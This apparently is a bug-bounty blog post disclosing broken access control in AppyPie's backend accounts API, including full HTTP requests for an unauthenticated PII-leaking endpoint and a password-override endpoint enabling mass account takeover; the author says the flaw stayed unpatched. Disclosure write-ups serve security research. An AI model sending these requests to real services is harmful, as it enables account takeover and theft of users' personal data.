I hacked 10 Million+ Accounts and here’s exactly how i did it. Easiest API hacking you’ll ever see.

So this company(AppyPie) had a max bounty of $1000. I wanted to try my luck. I majorly focus on BAC-related bugs. Broken Access Control and Business Logic Errors, this usually covers API hacking.

PII LEAK:

So i tried initially to gather all endpoints using my custom methodology already shared, interestingly. I get a subdomain called

backendaccounts.appypie.com

From here, I start following how the reset password page sends data to this, after a bit of fuzzing I see an endpoint, the best part is it tells me that its missing parameters, and quickly filling them up leads to this.

This bug poses a serious threat to user privacy as it leaks all sensitive user details, including location, zip code, address, mobile number, and any other information provided or collected during the registration process. This could result in a massive data breach, especially since the API also validates the email’s existence and facilitates unauthorized access

POC:
1. Let’s first create an account to verify(PASS: Nopassword+1)
2. Now We will use BAC flaw to overide the password and take over users account. Simply put desired user’s email and any other password.
3.This API has no such rate limits so Mass account takeovers are possible
4.Another enumeration shows we can ask the MongoDB via API to confirm if the database is updated.
5. We can now log in directly too.
6. Another API can directly pull data, without logging in, This does not even need the password:)

POST /api/testapi/Updatedatainmongo HTTP/1.1
Host: backendaccounts.appypie.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 97
Origin: https://accounts.appypie.com
Connection: close
Referer: https://accounts.appypie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
{"email":"[email protected]","data":{"passwordset":true,"password_update_time":1691063434108}}

This finally retrieves me a bunch of info related to the email i put in, this will be later chained to Maximise attack surface, bypass rate limits and simply guess email or dump their info straight. Yes, No need to login to steal PII:)

Now don’t get impatient, I promised a full account takeover and i shall deliver. So i was wondering if a “SaaS” Platform with 10 Million Clients, should have amazing Security right? RIGHT?

This bug allows attackers to perform a complete account takeover without any user interaction. By exploiting a BAC flaw, I was able to override the password for any desired user’s account simply by providing their email and an alternative password. What’s even more concerning is that the associated API does not have any rate limits, enabling mass account takeovers. Additionally, I discovered an endpoint that allows querying the MongoDB via API to confirm if the database is updated, and this can lead to unauthorized access.

POST /emailtemplate/setPasswordCognitoAdmin HTTP/1.1
Host: backendaccounts.appypie.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 58
Origin: https://accounts.appypie.com
Connection: close
Referer: https://accounts.appypie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
{"email":"[email protected]","password":"Passchange@1"}

So this was how I took over, 10 million+ accounts. That’s it but wait, there’s a bit of drama to this story. I reported this bug 7 months ago(Aug 3 2023), I reported 2 critical bugs and I was ghosted for months. Thinking, there must be issues with their mail, I reached out to them on Twitter, and even tweeted but this company proudly does not care about their 10 million+ user base.

The sad part is, that I used their platform in 2018 which I also took over to test.

I still waited and mailed them after 3–4 months and even created a ticket, but still nothing.

So I gave up, I tested the PII vulnerability a few months back and it worked so they still have not patched it. That’s all I can do.

From Now I will not hunt on Platformless Programs and focus more on Privates.

Conclusion:

I lost $1000, discovered that large SaaS platforms are vulnerable, and made more same month from smaller companies running bug bounties:)

CLAPPING more than once leads to +1 bounty for you this year. Wanna know if i should write on more advanced API hacking Or more POC from my hunts? lemme know

JOIN MY DISCORD:

Twitter:

https://twitter.com/DebprasadBaner9